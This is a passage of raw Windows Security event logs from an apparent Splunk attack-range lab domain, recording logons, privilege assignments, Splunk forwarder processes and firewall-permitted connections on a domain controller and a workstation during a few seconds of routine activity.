Logon ID: 0xBD6480
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278863
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278862
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Process Information:
Process ID: 0x185c
Process Name: C:\Windows\System32\dwm.exe
Exit Status: 0xD00002FE
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887261
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x175c
Process Name: C:\Windows\System32\TSTheme.exe
Exit Status: 0x0
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887260
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F96B4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887259
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8F96B4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::118f:34ac:1322:c17e
Source Port: 1274
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887258
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F96B4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887257
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1274
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887256
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1274
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887255
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Source Address: ::
Source Port: 1274
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887254
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F9646
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887253
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8F9646
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::118f:34ac:1322:c17e
Source Port: 1273
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887252
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8F9646
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887251
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1273
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887250
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1273
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887249
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Source Address: ::
Source Port: 1273
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887248
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63965
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887247
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 904
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1272
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887246
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1272
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887245
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2972
Application Name: \device\harddiskvolume1\windows\system32\dfsrs.exe
Network Information:
Source Address: ::
Source Port: 1272
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887244
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63966
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887243
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1b68
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Exit Status: 0x1
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887242
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 58319
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887241
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 55007
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887240
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 49741
Destination Address: 10.0.1.14
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887239
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b68
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887238
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 56153
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278894
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53913
Destination Address: 13.91.16.64
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278893
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278892
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 63546
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278891
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63546
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278890
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63546
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278889
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887268
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63963
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887267
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53233
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887266
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 63546
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887265
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4148
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1276
Destination Address: 10.0.1.12
Destination Port: 8089
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887264
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4148
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1276
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887263
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1275
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887262
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1275
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887270
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x15b8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887269
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278905
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53918
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
